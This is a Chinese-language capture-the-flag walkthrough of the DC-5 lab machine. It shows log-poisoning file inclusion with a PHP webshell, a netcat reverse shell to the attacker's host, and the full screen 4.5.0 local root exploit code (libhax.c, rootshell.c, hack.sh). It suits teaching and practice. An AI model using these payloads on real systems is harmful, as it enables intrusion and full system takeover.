渗透测试:DC-5靶机

一、扫描获取靶机ip

arp-sacn -l

在这里插入图片描述

192.168.203.144

二、获取网站信息

1.nmap

在这里插入图片描述

开放80、111端口

2.Wappaloyzer

访问网站

在这里插入图片描述
在这里插入图片描述

Web服务器:Nginx 1.6.2

3.dirb

dirb http://192.168.203.144

在这里插入图片描述

没有发现有价值的东西

三、提权

访问主页,发现只有contat存在交互

在这里插入图片描述

随便提交信息后进入thankyou.php

在这里插入图片描述

发现时间一直在改变

在这里插入图片描述

4.御剑

在这里插入图片描述

扫描发现

http://192.168.203.144/footer.php

访问发现每次访问也会改变时间

在这里插入图片描述

在这里插入图片描述

所以我们可以推断thankyou.php可能包含了footer.php。

使用burpsuit爆破出变量名file

在这里插入图片描述

已知nginx日志位置为/var/log/nginx/access.log(默认)

在这里插入图片描述

写入一句话木马

<?php system($_GET['cmd']);?>

在这里插入图片描述

5.蚁剑

使用蚁剑连接

在这里插入图片描述
在这里插入图片描述

linux攻击机进行监听

nc -lvvp 3939

使用蚁剑虚拟终端

在这里插入图片描述

nc -e /bin/bash 192.168.203.141 3939

成功监听到

在这里插入图片描述

使用python反弹一个交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

在这里插入图片描述

查看基本信息

在这里插入图片描述

使用find命令,查找具有root权限的命令

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

可以尝试利用 screen的漏洞

searchsploit screen 4.5.0

在这里插入图片描述

复制脚本

cp /usr/share/exploitdb/exploits/linux/local/41154.sh /root

查看文件,将红框部分另存为文件libhax.c

在这里插入图片描述

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){    
	chown("/tmp/rootshell", 0, 0);    
	chmod("/tmp/rootshell", 04755);    
	unlink("/etc/ld.so.preload");    
	printf("[+] done!\n");
}

在这里插入图片描述

将红框部分另存为rootshell.c

在这里插入图片描述

#include <stdio.h>
int main(void){    
	setuid(0);    
	setgid(0);    
	seteuid(0);    
	setegid(0);    
	execvp("/bin/sh", NULL, NULL);
}

在这里插入图片描述

运行两个脚本

gcc -fPIC -shared -ldl -o libhax.so  libhax.c       gcc编译为libhax.so文件
gcc -o rootshell rootshell.c                        gcc编译为rootshell

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

将红框部另存为hack.sh,并在保存hack.sh文件输入 :set ff=unix ,否则在执行脚本文件时后出错

在这里插入图片描述

echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell  

在这里插入图片描述

方法一

用蚁剑将libhas.so、rootshell、hack.sh上传到靶机的 /tmp文件夹下

在这里插入图片描述

方法二

scp root@192.168.203.141:/root/aaa/libhax.so /tmp/scp root@192.168.203.141:/root/aaa/rootshell /tmp/scp root@192.168.203.141:/root/aaa/hack.sh /tmp/

访问/tmp文件夹,给hack.sh最高权限,执行hack.sh文件

cd /cd /tmplschmod 777 hack.sh./hack.sh                                                              

在这里插入图片描述

提权成功

在 /root文件夹下找到flag

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值